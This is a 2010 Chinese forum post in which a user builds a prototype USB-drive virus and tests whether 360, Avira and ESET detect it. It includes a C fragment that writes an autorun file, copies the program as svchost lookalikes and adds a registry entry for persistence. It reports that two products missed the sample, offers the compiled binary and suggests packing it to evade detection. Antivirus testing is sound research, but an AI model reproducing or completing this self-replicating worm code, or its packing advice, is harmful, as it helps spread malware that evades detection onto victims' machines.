本帖最后由 似水无痕 于 2010-1-2 21:45 编辑
其实写这个主题是沉重的,尤其是这样的测试.
最近想了解一下病毒的编写,于是去网上找了些关于病毒源码来研究.于是便有了这次测试的想发,
部分关键代码
{
FILE *input,*output;
int i,k;
for(i=0;i<3;i++)
{
output=fopen(files_autorun,"w");
fprintf(output,"%s",autorun);
fclose(output);
}
for(i=0;i<=SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost,"rb"))!=NULL)
{
fclose(input);
for(k=0;k<SVCHOST_NUM;k++)
{
copy(files_svchost,files_svchost[k]);
}
i=SVCHOST_NUM+1;
}
}
system(regadd);
return 0;
}
病毒所具有的功能:
本病毒类似普通U盘病毒雏形,具备自我复制、运行能力。
测试的杀软有"360杀毒 红伞P版 ESET(NOD32) " 为什么选择这3个,是因为看到论坛里对这3个关注的人比较多
测试部分"主要测试杀软病毒库部分"不涉及HIPS部分
先上"360杀毒"并且更新病毒库到最新,看扫描结果
查看日志360杀毒扫描日志
病毒库版本:4808820
扫描时间:2010-01-02 17:01:16
扫描用时:00:00:01
扫描类型:右键菜单
扫描文件总数:1
威胁总数:0
扫描选项
----------------------
扫描所有文件:是
扫描压缩包:否
发现病毒处理方式:通知用户
扫描系统内存:是
扫描磁盘引导区:是
扫描Rootkit:否
使用启发式扫描:是
扫描内容
----------------------
C:\Documents and Settings\Administrator\桌面\卡饭杀软测试.EXE
白名单设置
----------------------
扫描结果
----------------------
未发现威胁文件
直接运行"卡饭杀软测试.EXE"
没什么反应
看我C盘跟目录文件夹
上红伞"照样先更新病毒库"更新后直接对其文件扫描.看结果
没有反映
直接运行原程序.
直接看C目录
红伞的测试就这样结束了
接下来ESET(NOD32)
按照惯例先把病毒库升级到最新
直接对其主文件扫描,
结果
还是没有报
直接运行原程序
运行后终于ESET(NOD32)有提示了
测试到这里已经没有精力去测试别的杀软了.我想结果也不会太乐观
写在最后的话:" ESET(NOD32)"在最后运行时终于报了.但并不代表它比别的强.
我这次的测试只是想告诉大家.杀软装一个就可以了.没必要装太多.从上面的测试应该可以看出来,病毒库还是基于"特征码来判断"它总是有点处于被动局面(有新的木马病毒出现,它才更新自我)
记住安全是个总体,只有自我不断的提高,那才是解决问题的根本
所以对于论坛里有人测试什么100/%之类的难免要打个问号.(记住"那只是对已知病毒,并且是已经泛滥的)
最后附上自己编译好的程序,加个壳我想测试的效果会更佳.(注意:仅做研究之用,请务破坏) |
[复制链接]
发表于 2010-1-2 20:22:12
